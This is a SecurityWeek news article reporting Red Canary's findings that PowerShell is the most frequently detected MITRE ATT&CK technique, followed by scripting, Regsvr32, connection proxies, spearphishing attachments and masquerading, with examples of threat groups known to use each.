Threat Actors Prefer PowerShell over Other ATT&CK Techniques, Report Shows
PowerShell is by far the most prevalent MITRE ATT&CK technique, being detected twice as often as the next most common technique, says a new report from cybersecurity firm Red Canary.
Data gathered from 10,000 confirmed threats reveals that PowerShell, scripting, Regsvr32, connection proxy, spearphishing attachments and masquerading were the most prevalent techniques, as described in MITRE’s Adversarial Tactics Techniques and Common Knowledge (ATT&CK) framework, according to Red Canary’s just-released Threat Detection Report.
The detections are drawn from endpoints at hundreds of organizations over five years, Red Canary told SecurityWeek. Roughly 10,000 additional detections associated with unwanted software such as adware were left out of the report.
The reason PowerShell is so prevalent is quite clear: it has been included in essentially every Windows operating system by default for a decade, provides access to Windows API, and is rarely constrained, thus allowing adversaries to perform administrative and automation tasks without risking being blocked.
With PowerShell libraries readily available, implementations can take advantage of the full functionality of PowerShell within arbitrary processes. The open-source and cross-platform availability of PowerShell has resulted in the creation of tools capable of building payloads to target Windows, macOS, and Linux in new, unpredictable ways, the report (PDF) points out.
Attackers can use PowerShell to direct the execution of a local script, retrieve and execute remote resources using various network protocols, encode payloads passed via the command line, or load PowerShell into other processes.
Adversaries known to leverage the technique in their attacks include Turla, which uses a post-infection executable to load malicious PowerShell scripts directly into memory. The Cobalt hackers too are known for the use of multiple instances of PowerShell in the later stages of their attacks.
A look at the top ten ATT&CK techniques by industry shows that PowerShell has been used in attacks across 15 verticals, including communication, education, energy, financial, government, health, and media industries. In all cases, it is either the most common or in top three most commonly used techniques.
“PowerShell is here to stay for administrators and adversaries alike, and those organizations that learn to defend against malicious uses of it will have a distinct advantage. Defending against PowerShell will require not just baselining and an understanding of changes in the ways adversaries use the tool, but defenders will also have to maintain intelligence related to a wide and changing variety of PowerShell attack tools,” Red Canary says.
Breakthroughs in methods for escaping script-host constrains on Windows and macOS, the report reveals, have created new opportunities for actors looking to leverage scripting as part of their malicious attacks. In addition to WScript and CScript, default scripting binaries on Windows systems, other applications can also execute scripts, including SXSL and WMIC, which expands the attack surface.
Chinese cyber-espionage group known as APT1 is known for the use of batch scripts in the early reconnaissance phase of their attacks, to gather system information, enumerate running services and processes, list accounts with administrative privileges, and gather other data. The Smoke Loader Trojan uses a Visual Basic script to ensure persistence.
Regsvr32.exe, a trusted component of the Windows platform, provides attackers with the means to execute native code or scripts, either by leveraging local resources or by loading them from a remote location. The state-sponsored espionage group Ocean Lotus and the espionage group APT19 are known for the use of regsvr32 in their attacks.
Used to direct network traffic between systems or act as intermediaries for network communications, connection proxies are used to obscure the identity or location of adversaries. Prominent examples of threat actors leveraging the technique include Duqu and APT10, both focused on espionage attacks.
Spearphishing attachment, the form of spearphishing that employs malware attached to an email, is a simple and effective technique that attackers can leverage for code execution. It allows for the use of multiple file types, thus providing the attackers with the flexibility of targeting the various applications that handle specific document types.
With virtually everyone having at least an email address, phishing provides attackers with a nearly unlimited array of potential targets. The technique relies on the victim’s trust to achieve its malicious intent, and there are also numerous tools available to prevent malicious attachments from reaching the victim’s inbox.
The technique, Red Canary points out, has been a particularly prolific tool among governments seeking to surveil supposed dissidents, as exemplified in Citizen Lab’s report last year on the targeting of Tibetan activists. The Leviathan (TEMP.Periscope) group has engaged in numerous attacks targeting defense contractors, universities with military research ties, law firms, and government agencies.
The Carbanak group too is believed to have leveraged spearphishing attachments as the initial infection vector in some of its attacks.
Masquerading, another prevalent MITRE ATT&CK technique, relies on manipulating the name or location of an executable to evade defensive technology or deceive potential victims. The $80 million heist from Bangladesh Bank leveraged the technique, as did the Calisto macOS Trojan that remained hidden for two years.
Credential Dumping, Registry Run Keys / Start Folder, Rundll32, and Service Execution rounded up top 10 techniques, Red Canary says. All these techniques, and tens others more, albeit used less, are here to stay, and they are also expected to evolve as attackers become more creative and discover new ways to leverage them.
Ionut Arghire is an international correspondent for SecurityWeek.
Tags: 
